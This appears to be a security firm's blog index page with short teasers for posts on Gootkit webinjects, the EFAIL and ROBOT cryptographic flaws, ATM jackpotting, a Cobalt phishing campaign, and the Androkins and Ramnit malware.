Corporate

Beautifying the webinjects of Gootkit

Beautifying the webinjects of Gootkit At first glance, Gootkit's webinjects may look like a messy bulk of binary data. But there is an easy way to decode them very nicely in just a matter of seconds. In this short article…

Leer más

EFAIL: Malleability in symmetric cipher systems

In the previous post about EFAIL (https://www.s21sec.com/en/blog/2018/05/8326/) we talked about the risk that results from PGP using a “malleable” encryption algorithm. But, what does this mean? In this post we will see how this “malleability” allows the creation of fake…

Leer más

EFAIL – Is PGP really dead?

A vulnerability affecting PGP and S/MIME has been recently published (https://efail.de/). These are two mechanisms used for email encryption. As a way to mitigate this vulnerability, it has been recommended to disable message decryption plugins installed in email clients, and…

Leer más

First year of the COMPACT Project

Hacker themed films always tend to focus on threats against nation-wide organizations, such as army infrastructures, intelligence and counter-intelligence agencies, or even huge hydroelectric power plants whose failure threaten to flood thousands of square kilometres, affecting millions of people. Of…

Leer más

Solving the ROBOT CTF

After the publication of the previous post on ROBOT (https://www.s21sec.com/en/blog/2017/12/robot-bleichenbacher-returns/), some people wanted to see a proof of concept of the attack, so I started developing a set of tools that demonstrated an attack using a Bleichenbacher oracle. After a…

Leer más

ATM Jackpotting attacks reach the U.S.A

ATM Jackpotting attacks reach the U.S.A ATM operators in the U.S.A. have started 2018 with a new headache to take care of, as recent news show that ATM Jackpotting (a cyber-criminal technique widely spread across LATAM, Asia & Europe) has…

Leer más

ROBOT: Bleichenbacher returns

“Those who do not remember the past are condemned to repeat it” (George Santayana) Some days ago, a new vulnerability known as ROBOT and affecting some SSL/TLS implementations has been published. This acronym refers to “Return Of Bleichenbacher’s Oracle Thread”.…

Leer más

COBALT ATTACKS IN THE WILD

Recently, our analyst team had come across a suspicious email coming from a Russian sender with the following information: Subject: Блокировка интернет ресурса Sender: info@roskomnadzor.info Attached File: Wire problems.doc The Microsoft Word (MD5: c2c753f440314d1ec88c1569aa845ac2) was indeed a Microsoft Office RTF…

Leer más

Androkins hits Colombia

  A few weeks ago we wrote about Androkins (1). Since then we have been actively monitoring Androkins activity, and we are periodically seeing new and new botnets added to the list. Androkins botnets have an internal name which can…

Leer más

Ramnit and its Pony module

In our automatic malware analysis tool we just have noticed an odd thing. When a Ramnit sample entered our sandbox, sometimes, activity of the password stealer trojan Pony was flagged, too. Since Pony can act as a downloader and can…

Leer más